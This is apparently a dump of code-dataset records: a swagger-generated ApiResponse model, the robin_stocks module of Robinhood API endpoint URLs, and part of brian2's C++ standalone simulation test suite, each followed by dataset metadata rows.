        return self._code
    @code.setter
    def code(self, code: int):
        """Sets the code of this ApiResponse.
        :param code: The code of this ApiResponse.
        :type code: int
        """
        self._code = code
    @property
    def type(self) -> str:
        """Gets the type of this ApiResponse.
        :return: The type of this ApiResponse.
        :rtype: str
        """
        return self._type
    @type.setter
    def type(self, type: str):
        """Sets the type of this ApiResponse.
        :param type: The type of this ApiResponse.
        :type type: str
        """
        self._type = type
    @property
    def message(self) -> str:
        """Gets the message of this ApiResponse.
        :return: The message of this ApiResponse.
        :rtype: str
        """
        return self._message
    @message.setter
    def message(self, message: str):
        """Sets the message of this ApiResponse.
        :param message: The message of this ApiResponse.
        :type message: str
        """
        self._message = message
| 23.66087 | 88 | 0.570379 |
from __future__ import absolute_import
from datetime import date, datetime
from typing import List, Dict
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ApiResponse(Model):
def __init__(self, code: int=None, type: str=None, message: str=None):
self.swagger_types = {
'code': int,
'type': str,
'message': str
}
self.attribute_map = {
'code': 'code',
'type': 'type',
'message': 'message'
}
self._code = code
self._type = type
self._message = message
@classmethod
def from_dict(cls, dikt) -> 'ApiResponse':
return util.deserialize_model(dikt, cls)
@property
def code(self) -> int:
return self._code
@code.setter
def code(self, code: int):
self._code = code
@property
def type(self) -> str:
return self._type
@type.setter
def type(self, type: str):
self._type = type
@property
def message(self) -> str:
return self._message
@message.setter
def message(self, message: str):
self._message = message
| true | true |
f7234db37ba135caeb76fb9bc59c861d43cdb040 | 6,054 | py | Python | robin_stocks/urls.py | jacov/robin_stocks | c7dba7f9680be7d518577fcfce2a3edecf5a13a1 | [
"MIT"
] | null | null | null | robin_stocks/urls.py | jacov/robin_stocks | c7dba7f9680be7d518577fcfce2a3edecf5a13a1 | [
"MIT"
] | null | null | null | robin_stocks/urls.py | jacov/robin_stocks | c7dba7f9680be7d518577fcfce2a3edecf5a13a1 | [
"MIT"
] | null | null | null | """Contains all the url endpoints for interacting with Robinhood API."""
from robin_stocks.helper import id_for_chain, id_for_stock
# Login
def login_url():
    """URL for requesting an OAuth2 access token (login)."""
    return('https://api.robinhood.com/oauth2/token/')
def challenge_url(challenge_id):
    """URL for responding to the login challenge ``challenge_id``."""
    return('https://api.robinhood.com/challenge/{0}/respond/'.format(challenge_id))
# Profiles
def account_profile():
    """URL listing the user's trading accounts."""
    return('https://api.robinhood.com/accounts/')
def basic_profile():
    """URL for the user's basic personal information."""
    return('https://api.robinhood.com/user/basic_info/')
def investment_profile():
    """URL for the user's investment profile."""
    return('https://api.robinhood.com/user/investment_profile/')
def portfolio_profile():
    """URL listing the user's portfolios."""
    return('https://api.robinhood.com/portfolios/')
def security_profile():
    """URL for additional (security-related) user information."""
    return('https://api.robinhood.com/user/additional_info/')
def user_profile():
    """URL for the core user profile."""
    return('https://api.robinhood.com/user/')
# Stocks
def earnings():
    """URL for earnings-report market data."""
    return('https://api.robinhood.com/marketdata/earnings/')
def events():
    """URL for option events (expirations, assignments, ...)."""
    return('https://api.robinhood.com/options/events/')
def fundamentals():
    """URL for stock fundamentals data."""
    return('https://api.robinhood.com/fundamentals/')
def historicals():
    """URL for historical stock quotes."""
    return('https://api.robinhood.com/quotes/historicals/')
def instruments():
    """URL listing tradeable instruments."""
    return('https://api.robinhood.com/instruments/')
def news(symbol):
    """URL for news articles about ``symbol``."""
    return('https://api.robinhood.com/midlands/news/{0}/?'.format(symbol))
def popularity(symbol):
    """URL for the popularity of ``symbol``; resolves the symbol to an instrument id."""
    return('https://api.robinhood.com/instruments/{0}/popularity/'.format(id_for_stock(symbol)))
def quotes():
    """URL for current stock quotes."""
    return('https://api.robinhood.com/quotes/')
def ratings(symbol):
    """URL for analyst ratings of ``symbol``; resolves the symbol to an instrument id."""
    return('https://api.robinhood.com/midlands/ratings/{0}/'.format(id_for_stock(symbol)))
def splits(symbol):
    """URL for the split history of ``symbol``; resolves the symbol to an instrument id."""
    return('https://api.robinhood.com/instruments/{0}/splits/'.format(id_for_stock(symbol)))
# account
def positions():
    """URL listing stock positions."""
    return('https://api.robinhood.com/positions/')
def banktransfers():
    """URL for ACH bank transfers."""
    return('https://api.robinhood.com/ach/transfers/')
def daytrades(account):
    """URL for recent day trades of the given ``account`` number."""
    return('https://api.robinhood.com/accounts/{0}/recent_day_trades/'.format(account))
def dividends():
    """URL listing dividend payments."""
    return('https://api.robinhood.com/dividends/')
def documents():
    """URL listing account documents (statements, trade confirmations)."""
    return('https://api.robinhood.com/documents/')
def linked(id=None, unlink=False):
    """URL for ACH bank relationships.

    With no arguments: the relationship collection.  With ``id``: that
    relationship's detail URL.  With ``unlink=True``: the unlink action
    for ``id``.
    """
    base = 'https://api.robinhood.com/ach/relationships/'
    if unlink:
        return base + '{0}/unlink/'.format(id)
    if id:
        return base + '{0}/'.format(id)
    return base
def margin():
    """URL listing margin calls."""
    return('https://api.robinhood.com/margin/calls/')
def margininterest():
    """URL listing margin interest charges."""
    return('https://api.robinhood.com/cash_journal/margin_interest_charges/')
def notifications(tracker=False):
    """URL for notification devices, or the notification tracker when ``tracker`` is truthy."""
    tracker_endpoint = 'https://api.robinhood.com/midlands/notifications/notification_tracker/'
    devices_endpoint = 'https://api.robinhood.com/notifications/devices/'
    return tracker_endpoint if tracker else devices_endpoint
def referral():
    """URL for referral information."""
    return('https://api.robinhood.com/midlands/referral/')
def stockloan():
    """URL listing stock-loan payments."""
    return('https://api.robinhood.com/stock_loan/payments/')
def subscription():
    """URL listing subscription (Robinhood Gold) fees."""
    return('https://api.robinhood.com/subscription/subscription_fees/')
def wiretransfers():
    """URL for wire transfers."""
    # NOTE(review): no trailing slash, unlike the sibling endpoints -- confirm intended.
    return('https://api.robinhood.com/wire/transfers')
def watchlists(name=None, add=False):
    """URL for watchlists.

    With no arguments: the watchlist collection.  With ``name``: that
    watchlist's detail URL.  With ``add=True``: the bulk-add action for
    ``name``.
    """
    base = 'https://api.robinhood.com/watchlists/'
    if add:
        return base + '{0}/bulk_add/'.format(name)
    if name:
        return base + '{0}/'.format(name)
    return base
# markets
def currency():
    """URL listing crypto currency pairs (nummus service)."""
    return('https://nummus.robinhood.com/currency_pairs/')
def markets():
    """URL listing stock markets/exchanges."""
    return('https://api.robinhood.com/markets/')
def movers():
    """URL for the S&P 500 top movers."""
    return('https://api.robinhood.com/midlands/movers/sp500/')
# options
def aggregate():
    """URL for aggregated option positions."""
    return('https://api.robinhood.com/options/aggregate_positions/')
def chains(symbol):
    """URL for the option chain of ``symbol``; resolves the symbol to a chain id."""
    return('https://api.robinhood.com/options/chains/{0}/'.format(id_for_chain(symbol)))
def option_historicals(id):
    """URL for historical market data of the option instrument ``id``."""
    return('https://api.robinhood.com/marketdata/options/historicals/{0}/'.format(id))
def option_instruments(id=None):
if id:
return('https://api.robinhood.com/options/instruments/{0}/'.format(id))
else:
return('https://api.robinhood.com/options/instruments/')
def option_orders(orderID=None):
if orderID:
return('https://api.robinhood.com/options/orders/{0}/'.format(orderID))
else:
return('https://api.robinhood.com/options/orders/')
def option_positions():
return('https://api.robinhood.com/options/positions/')
def marketdata_options(id):
return('https://api.robinhood.com/marketdata/options/{0}/'.format(id))
# pricebook
def marketdata_quotes(id):
return ('https://api.robinhood.com/marketdata/quotes/{0}/'.format(id))
def marketdata_pricebook(id):
return ('https://api.robinhood.com/marketdata/pricebook/snapshots/{0}/'.format(id))
# crypto
def order_crypto():
return('https://nummus.robinhood.com/orders/')
def crypto_account():
return('https://nummus.robinhood.com/accounts/')
def crypto_currency_pairs():
return('https://nummus.robinhood.com/currency_pairs/')
def crypto_quote(id):
return('https://api.robinhood.com/marketdata/forex/quotes/{0}/'.format(id))
def crypto_holdings():
return('https://nummus.robinhood.com/holdings/')
def crypto_historical(id):
return('https://api.robinhood.com/marketdata/forex/historicals/{0}/'.format(id))
def crypto_orders(orderID=None):
if orderID:
return('https://nummus.robinhood.com/orders/{0}/'.format(orderID))
else:
return('https://nummus.robinhood.com/orders/')
def crypto_cancel(id):
return('https://nummus.robinhood.com/orders/{0}/cancel/'.format(id))
# orders
def cancel(url):
return('https://api.robinhood.com/orders/{0}/cancel/'.format(url))
def option_cancel(id):
return('https://api.robinhood.com/options/orders/{0}/cancel/'.format(id))
def orders(orderID=None):
if orderID:
return('https://api.robinhood.com/orders/{0}/'.format(orderID))
else:
return('https://api.robinhood.com/orders/')
| 22.674157 | 96 | 0.693261 | from robin_stocks.helper import id_for_chain, id_for_stock
def login_url():
return('https://api.robinhood.com/oauth2/token/')
def challenge_url(challenge_id):
return('https://api.robinhood.com/challenge/{0}/respond/'.format(challenge_id))
def account_profile():
return('https://api.robinhood.com/accounts/')
def basic_profile():
return('https://api.robinhood.com/user/basic_info/')
def investment_profile():
return('https://api.robinhood.com/user/investment_profile/')
def portfolio_profile():
return('https://api.robinhood.com/portfolios/')
def security_profile():
return('https://api.robinhood.com/user/additional_info/')
def user_profile():
return('https://api.robinhood.com/user/')
def earnings():
return('https://api.robinhood.com/marketdata/earnings/')
def events():
return('https://api.robinhood.com/options/events/')
def fundamentals():
return('https://api.robinhood.com/fundamentals/')
def historicals():
return('https://api.robinhood.com/quotes/historicals/')
def instruments():
return('https://api.robinhood.com/instruments/')
def news(symbol):
return('https://api.robinhood.com/midlands/news/{0}/?'.format(symbol))
def popularity(symbol):
return('https://api.robinhood.com/instruments/{0}/popularity/'.format(id_for_stock(symbol)))
def quotes():
return('https://api.robinhood.com/quotes/')
def ratings(symbol):
return('https://api.robinhood.com/midlands/ratings/{0}/'.format(id_for_stock(symbol)))
def splits(symbol):
return('https://api.robinhood.com/instruments/{0}/splits/'.format(id_for_stock(symbol)))
def positions():
return('https://api.robinhood.com/positions/')
def banktransfers():
return('https://api.robinhood.com/ach/transfers/')
def daytrades(account):
return('https://api.robinhood.com/accounts/{0}/recent_day_trades/'.format(account))
def dividends():
return('https://api.robinhood.com/dividends/')
def documents():
return('https://api.robinhood.com/documents/')
def linked(id=None, unlink=False):
if unlink:
return('https://api.robinhood.com/ach/relationships/{0}/unlink/'.format(id))
if id:
return('https://api.robinhood.com/ach/relationships/{0}/'.format(id))
else:
return('https://api.robinhood.com/ach/relationships/')
def margin():
return('https://api.robinhood.com/margin/calls/')
def margininterest():
return('https://api.robinhood.com/cash_journal/margin_interest_charges/')
def notifications(tracker=False):
if tracker:
return('https://api.robinhood.com/midlands/notifications/notification_tracker/')
else:
return('https://api.robinhood.com/notifications/devices/')
def referral():
return('https://api.robinhood.com/midlands/referral/')
def stockloan():
return('https://api.robinhood.com/stock_loan/payments/')
def subscription():
return('https://api.robinhood.com/subscription/subscription_fees/')
def wiretransfers():
return('https://api.robinhood.com/wire/transfers')
def watchlists(name=None, add=False):
if add:
return('https://api.robinhood.com/watchlists/{0}/bulk_add/'.format(name))
if name:
return('https://api.robinhood.com/watchlists/{0}/'.format(name))
else:
return('https://api.robinhood.com/watchlists/')
def currency():
return('https://nummus.robinhood.com/currency_pairs/')
def markets():
return('https://api.robinhood.com/markets/')
def movers():
return('https://api.robinhood.com/midlands/movers/sp500/')
def aggregate():
return('https://api.robinhood.com/options/aggregate_positions/')
def chains(symbol):
return('https://api.robinhood.com/options/chains/{0}/'.format(id_for_chain(symbol)))
def option_historicals(id):
return('https://api.robinhood.com/marketdata/options/historicals/{0}/'.format(id))
def option_instruments(id=None):
if id:
return('https://api.robinhood.com/options/instruments/{0}/'.format(id))
else:
return('https://api.robinhood.com/options/instruments/')
def option_orders(orderID=None):
if orderID:
return('https://api.robinhood.com/options/orders/{0}/'.format(orderID))
else:
return('https://api.robinhood.com/options/orders/')
def option_positions():
return('https://api.robinhood.com/options/positions/')
def marketdata_options(id):
return('https://api.robinhood.com/marketdata/options/{0}/'.format(id))
def marketdata_quotes(id):
return ('https://api.robinhood.com/marketdata/quotes/{0}/'.format(id))
def marketdata_pricebook(id):
return ('https://api.robinhood.com/marketdata/pricebook/snapshots/{0}/'.format(id))
def order_crypto():
return('https://nummus.robinhood.com/orders/')
def crypto_account():
return('https://nummus.robinhood.com/accounts/')
def crypto_currency_pairs():
return('https://nummus.robinhood.com/currency_pairs/')
def crypto_quote(id):
return('https://api.robinhood.com/marketdata/forex/quotes/{0}/'.format(id))
def crypto_holdings():
return('https://nummus.robinhood.com/holdings/')
def crypto_historical(id):
return('https://api.robinhood.com/marketdata/forex/historicals/{0}/'.format(id))
def crypto_orders(orderID=None):
if orderID:
return('https://nummus.robinhood.com/orders/{0}/'.format(orderID))
else:
return('https://nummus.robinhood.com/orders/')
def crypto_cancel(id):
return('https://nummus.robinhood.com/orders/{0}/cancel/'.format(id))
def cancel(url):
return('https://api.robinhood.com/orders/{0}/cancel/'.format(url))
def option_cancel(id):
return('https://api.robinhood.com/options/orders/{0}/cancel/'.format(id))
def orders(orderID=None):
if orderID:
return('https://api.robinhood.com/orders/{0}/'.format(orderID))
else:
return('https://api.robinhood.com/orders/')
| true | true |
f7234e411ec0118933284b5a74d1ea25b8cace95 | 15,644 | py | Python | brian2/tests/test_cpp_standalone.py | brian-team/brian2numba | 6958a9716bc87f04f8a40d0f6d7d4ed1140deb00 | [
"BSD-2-Clause"
] | 1 | 2019-03-31T09:02:08.000Z | 2019-03-31T09:02:08.000Z | brian2/tests/test_cpp_standalone.py | brian-team/brian2numba | 6958a9716bc87f04f8a40d0f6d7d4ed1140deb00 | [
"BSD-2-Clause"
] | null | null | null | brian2/tests/test_cpp_standalone.py | brian-team/brian2numba | 6958a9716bc87f04f8a40d0f6d7d4ed1140deb00 | [
"BSD-2-Clause"
] | null | null | null | import tempfile
from nose import with_setup, SkipTest
from nose.plugins.attrib import attr
from numpy.testing.utils import assert_allclose, assert_equal, assert_raises
from brian2 import *
from brian2.devices.device import reinit_devices, set_device, reset_device
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_cpp_standalone(with_output=False):
set_device('cpp_standalone', build_on_run=False)
##### Define the model
tau = 1*ms
eqs = '''
dV/dt = (-40*mV-V)/tau : volt (unless refractory)
'''
threshold = 'V>-50*mV'
reset = 'V=-60*mV'
refractory = 5*ms
N = 1000
G = NeuronGroup(N, eqs,
reset=reset,
threshold=threshold,
refractory=refractory,
name='gp')
G.V = '-i*mV'
M = SpikeMonitor(G)
S = Synapses(G, G, 'w : volt', on_pre='V += w')
S.connect('abs(i-j)<5 and i!=j')
S.w = 0.5*mV
S.delay = '0*ms'
net = Network(G, M, S)
net.run(100*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True,
with_output=with_output)
# we do an approximate equality here because depending on minor details of how it was compiled, the results
# may be slightly different (if -ffast-math is on)
assert len(M.i)>=17000 and len(M.i)<=18000
assert len(M.t) == len(M.i)
assert M.t[0] == 0.
assert M.t[-1] == 100*ms - defaultclock.dt
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_dt_changes_between_runs_standalone(with_output=False):
set_device('cpp_standalone', build_on_run=False)
defaultclock.dt = 0.1*ms
G = NeuronGroup(1, 'v:1')
mon = StateMonitor(G, 'v', record=True)
run(.5*ms)
defaultclock.dt = .5*ms
run(.5*ms)
defaultclock.dt = 0.1*ms
run(.5*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True,
with_output=True)
assert len(mon.t[:]) == 5 + 1 + 5
assert_allclose(mon.t[:],
[0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 1., 1.1, 1.2, 1.3, 1.4]*ms)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_multiple_connects(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, 'v:1')
S = Synapses(G, G, 'w:1')
S.connect(i=[0], j=[0])
S.connect(i=[1], j=[1])
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
run(0*ms)
device.build(directory=tempdir, compile=True, run=True,
with_output=True)
assert len(S) == 2 and len(S.w[:]) == 2
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_storing_loading(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, '''v : volt
x : 1
n : integer
b : boolean''')
v = np.arange(10)*volt
x = np.arange(10, 20)
n = np.arange(20, 30)
b = np.array([True, False]).repeat(5)
G.v = v
G.x = x
G.n = n
G.b = b
S = Synapses(G, G, '''v_syn : volt
x_syn : 1
n_syn : integer
b_syn : boolean''')
S.connect(j='i')
S.v_syn = v
S.x_syn = x
S.n_syn = n
S.b_syn = b
run(0*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True, with_output=True)
assert_allclose(G.v[:], v)
assert_allclose(S.v_syn[:], v)
assert_allclose(G.x[:], x)
assert_allclose(S.x_syn[:], x)
assert_allclose(G.n[:], n)
assert_allclose(S.n_syn[:], n)
assert_allclose(G.b[:], b)
assert_allclose(S.b_syn[:], b)
reset_device()
@attr('cpp_standalone', 'standalone-only', 'openmp')
@with_setup(teardown=reinit_devices)
def test_openmp_consistency(with_output=False):
previous_device = get_device()
n_cells = 100
n_recorded = 10
numpy.random.seed(42)
taum = 20 * ms
taus = 5 * ms
Vt = -50 * mV
Vr = -60 * mV
El = -49 * mV
fac = (60 * 0.27 / 10)
gmax = 20*fac
dApre = .01
taupre = 20 * ms
taupost = taupre
dApost = -dApre * taupre / taupost * 1.05
dApost *= 0.1*gmax
dApre *= 0.1*gmax
connectivity = numpy.random.randn(n_cells, n_cells)
sources = numpy.random.random_integers(0, n_cells-1, 10*n_cells)
# Only use one spike per time step (to rule out that a single source neuron
# has more than one spike in a time step)
times = numpy.random.choice(numpy.arange(10*n_cells), 10*n_cells,
replace=False)*ms
v_init = Vr + numpy.random.rand(n_cells) * (Vt - Vr)
eqs = Equations('''
dv/dt = (g-(v-El))/taum : volt
dg/dt = -g/taus : volt
''')
results = {}
for (n_threads, devicename) in [(0, 'runtime'),
(0, 'cpp_standalone'),
(1, 'cpp_standalone'),
(2, 'cpp_standalone'),
(3, 'cpp_standalone'),
(4, 'cpp_standalone')]:
set_device(devicename, build_on_run=False, with_output=False)
Synapses.__instances__().clear()
if devicename=='cpp_standalone':
reinit_devices()
prefs.devices.cpp_standalone.openmp_threads = n_threads
P = NeuronGroup(n_cells, model=eqs, threshold='v>Vt', reset='v=Vr', refractory=5 * ms)
Q = SpikeGeneratorGroup(n_cells, sources, times)
P.v = v_init
P.g = 0 * mV
S = Synapses(P, P,
model = '''dApre/dt=-Apre/taupre : 1 (event-driven)
dApost/dt=-Apost/taupost : 1 (event-driven)
w : 1''',
pre = '''g += w*mV
Apre += dApre
w = w + Apost''',
post = '''Apost += dApost
w = w + Apre''')
S.connect()
S.w = fac*connectivity.flatten()
T = Synapses(Q, P, model = "w : 1", on_pre="g += w*mV")
T.connect(j='i')
T.w = 10*fac
spike_mon = SpikeMonitor(P)
rate_mon = PopulationRateMonitor(P)
state_mon = StateMonitor(S, 'w', record=range(n_recorded), dt=0.1*second)
v_mon = StateMonitor(P, 'v', record=range(n_recorded))
run(0.2 * second, report='text')
if devicename=='cpp_standalone':
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True,
run=True, with_output=with_output)
results[n_threads, devicename] = {}
results[n_threads, devicename]['w'] = state_mon.w
results[n_threads, devicename]['v'] = v_mon.v
results[n_threads, devicename]['s'] = spike_mon.num_spikes
results[n_threads, devicename]['r'] = rate_mon.rate[:]
for key1, key2 in [((0, 'runtime'), (0, 'cpp_standalone')),
((1, 'cpp_standalone'), (0, 'cpp_standalone')),
((2, 'cpp_standalone'), (0, 'cpp_standalone')),
((3, 'cpp_standalone'), (0, 'cpp_standalone')),
((4, 'cpp_standalone'), (0, 'cpp_standalone'))
]:
assert_allclose(results[key1]['w'], results[key2]['w'])
assert_allclose(results[key1]['v'], results[key2]['v'])
assert_allclose(results[key1]['r'], results[key2]['r'])
assert_allclose(results[key1]['s'], results[key2]['s'])
reset_device(previous_device)
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_timedarray(with_output=True):
set_device('cpp_standalone', build_on_run=False)
defaultclock.dt = 0.1*ms
ta1d = TimedArray(np.arange(10)*volt, dt=1*ms)
ta2d = TimedArray(np.arange(300).reshape(3, 100).T, dt=defaultclock.dt)
G = NeuronGroup(4, '''x = ta1d(t) : volt
y = ta2d(t, i) : 1''')
mon = StateMonitor(G, ['x', 'y'], record=True)
run(11*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True,
run=True, with_output=with_output)
for idx in xrange(4):
# x variable should have neuron independent values
assert_equal(mon[idx].x[:],
np.clip(np.arange(11).repeat(10), 0, 9)*volt)
for idx in xrange(3):
# y variable is neuron-specific
assert_equal(mon[idx].y[:],
np.clip(np.arange(110), 0, 99) + idx*100)
# the 2d array only has 3 columns, the last neuron should therefore contain
# only NaN
assert_equal(mon[3].y[:], np.nan)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_duplicate_names_across_nets(with_output=True):
set_device('cpp_standalone', build_on_run=False)
# In standalone mode, names have to be globally unique, not just unique
# per network
obj1 = BrianObject(name='name1')
obj2 = BrianObject(name='name2')
obj3 = BrianObject(name='name3')
obj4 = BrianObject(name='name1')
net1 = Network(obj1, obj2)
net2 = Network(obj3, obj4)
net1.run(0*ms)
net2.run(0*ms)
assert_raises(ValueError, lambda: device.build())
reset_device()
@attr('cpp_standalone', 'standalone-only', 'openmp')
@with_setup(teardown=reinit_devices)
def test_openmp_scalar_writes(with_output=False):
# Test that writing to a scalar variable only is done once in an OpenMP
# setting (see github issue #551)
set_device('cpp_standalone', build_on_run=False)
prefs.devices.cpp_standalone.openmp_threads = 4
G = NeuronGroup(10, 's : 1 (shared)')
G.run_regularly('s += 1')
run(defaultclock.dt)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert_equal(G.s[:], 1.0)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_time_after_run(with_output=False):
set_device('cpp_standalone', build_on_run=False)
# Check that the clock and network time after a run is correct, even if we
# have not actually run the code yet (via build)
G = NeuronGroup(10, 'dv/dt = -v/(10*ms) : 1')
net = Network(G)
assert_allclose(defaultclock.dt, 0.1*ms)
assert_allclose(defaultclock.t, 0.*ms)
assert_allclose(G.t, 0.*ms)
assert_allclose(net.t, 0.*ms)
net.run(10*ms)
assert_allclose(defaultclock.t, 10.*ms)
assert_allclose(G.t, 10.*ms)
assert_allclose(net.t, 10.*ms)
net.run(10*ms)
assert_allclose(defaultclock.t, 20.*ms)
assert_allclose(G.t, 20.*ms)
assert_allclose(net.t, 20.*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
# Everything should of course still be accessible
assert_allclose(defaultclock.t, 20.*ms)
assert_allclose(G.t, 20.*ms)
assert_allclose(net.t, 20.*ms)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_array_cache(with_output=False):
# Check that variables are only accessible from Python when they should be
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, '''dv/dt = -v / (10*ms) : 1
w : 1
x : 1
y : 1
z : 1 (shared)''',
threshold='v>1')
S = Synapses(G, G, 'weight: 1', on_pre='w += weight')
S.connect(p=0.2)
S.weight = 7
# All neurongroup values should be known
assert_allclose(G.v, 0)
assert_allclose(G.w, 0)
assert_allclose(G.x, 0)
assert_allclose(G.y, 0)
assert_allclose(G.z, 0)
assert_allclose(G.i, np.arange(10))
# But the synaptic variable is not -- we don't know the number of synapses
assert_raises(NotImplementedError, lambda: S.weight[:])
# Setting variables with explicit values should not change anything
G.v = np.arange(10)+1
G.w = 2
G.y = 5
G.z = 7
assert_allclose(G.v, np.arange(10)+1)
assert_allclose(G.w, 2)
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
# But setting with code should invalidate them
G.x = 'i*2'
assert_raises(NotImplementedError, lambda: G.x[:])
# Make sure that the array cache does not allow to use incorrectly sized
# values to pass
assert_raises(ValueError, lambda: setattr(G, 'w', [0, 2]))
assert_raises(ValueError, lambda: G.w.__setitem__(slice(0, 4), [0, 2]))
run(10*ms)
# v is now no longer known without running the network
assert_raises(NotImplementedError, lambda: G.v[:])
# Neither is w, it is updated in the synapse
assert_raises(NotImplementedError, lambda: G.w[:])
# However, no code touches y or z
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
# i is read-only anyway
assert_allclose(G.i, np.arange(10))
# After actually running the network, everything should be accessible
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert all(G.v > 0)
assert all(G.w > 0)
assert_allclose(G.x, np.arange(10)*2)
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
assert_allclose(G.i, np.arange(10))
assert_allclose(S.weight, 7)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_active_flag_standalone(with_output=True):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(1, 'dv/dt = 1/ms : 1')
mon = StateMonitor(G, 'v', record=0)
mon.active = False
run(1*ms)
mon.active = True
G.active = False
run(1*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir)
# Monitor should start recording at 1ms
# Neurongroup should not integrate after 1ms (but should have integrated before)
assert_allclose(mon[0].t[0], 1*ms)
assert_allclose(mon[0].v, 1.0)
if __name__=='__main__':
# Print the debug output when testing this file only but not when running
# via nose test
for t in [
test_cpp_standalone,
test_dt_changes_between_runs_standalone,
test_multiple_connects,
test_storing_loading,
test_openmp_consistency,
test_timedarray,
test_duplicate_names_across_nets,
test_openmp_scalar_writes,
test_time_after_run,
test_array_cache,
test_active_flag_standalone
]:
t(with_output=True)
reinit_devices()
| 35.234234 | 111 | 0.59077 | import tempfile
from nose import with_setup, SkipTest
from nose.plugins.attrib import attr
from numpy.testing.utils import assert_allclose, assert_equal, assert_raises
from brian2 import *
from brian2.devices.device import reinit_devices, set_device, reset_device
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_cpp_standalone(with_output=False):
set_device('cpp_standalone', build_on_run=False)
tory)
'''
threshold = 'V>-50*mV'
reset = 'V=-60*mV'
refractory = 5*ms
N = 1000
G = NeuronGroup(N, eqs,
reset=reset,
threshold=threshold,
refractory=refractory,
name='gp')
G.V = '-i*mV'
M = SpikeMonitor(G)
S = Synapses(G, G, 'w : volt', on_pre='V += w')
S.connect('abs(i-j)<5 and i!=j')
S.w = 0.5*mV
S.delay = '0*ms'
net = Network(G, M, S)
net.run(100*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True,
with_output=with_output)
assert len(M.i)>=17000 and len(M.i)<=18000
assert len(M.t) == len(M.i)
assert M.t[0] == 0.
assert M.t[-1] == 100*ms - defaultclock.dt
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_dt_changes_between_runs_standalone(with_output=False):
set_device('cpp_standalone', build_on_run=False)
defaultclock.dt = 0.1*ms
G = NeuronGroup(1, 'v:1')
mon = StateMonitor(G, 'v', record=True)
run(.5*ms)
defaultclock.dt = .5*ms
run(.5*ms)
defaultclock.dt = 0.1*ms
run(.5*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True,
with_output=True)
assert len(mon.t[:]) == 5 + 1 + 5
assert_allclose(mon.t[:],
[0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 1., 1.1, 1.2, 1.3, 1.4]*ms)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_multiple_connects(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, 'v:1')
S = Synapses(G, G, 'w:1')
S.connect(i=[0], j=[0])
S.connect(i=[1], j=[1])
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
run(0*ms)
device.build(directory=tempdir, compile=True, run=True,
with_output=True)
assert len(S) == 2 and len(S.w[:]) == 2
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_storing_loading(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, '''v : volt
x : 1
n : integer
b : boolean''')
v = np.arange(10)*volt
x = np.arange(10, 20)
n = np.arange(20, 30)
b = np.array([True, False]).repeat(5)
G.v = v
G.x = x
G.n = n
G.b = b
S = Synapses(G, G, '''v_syn : volt
x_syn : 1
n_syn : integer
b_syn : boolean''')
S.connect(j='i')
S.v_syn = v
S.x_syn = x
S.n_syn = n
S.b_syn = b
run(0*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True, with_output=True)
assert_allclose(G.v[:], v)
assert_allclose(S.v_syn[:], v)
assert_allclose(G.x[:], x)
assert_allclose(S.x_syn[:], x)
assert_allclose(G.n[:], n)
assert_allclose(S.n_syn[:], n)
assert_allclose(G.b[:], b)
assert_allclose(S.b_syn[:], b)
reset_device()
@attr('cpp_standalone', 'standalone-only', 'openmp')
@with_setup(teardown=reinit_devices)
def test_openmp_consistency(with_output=False):
previous_device = get_device()
n_cells = 100
n_recorded = 10
numpy.random.seed(42)
taum = 20 * ms
taus = 5 * ms
Vt = -50 * mV
Vr = -60 * mV
El = -49 * mV
fac = (60 * 0.27 / 10)
gmax = 20*fac
dApre = .01
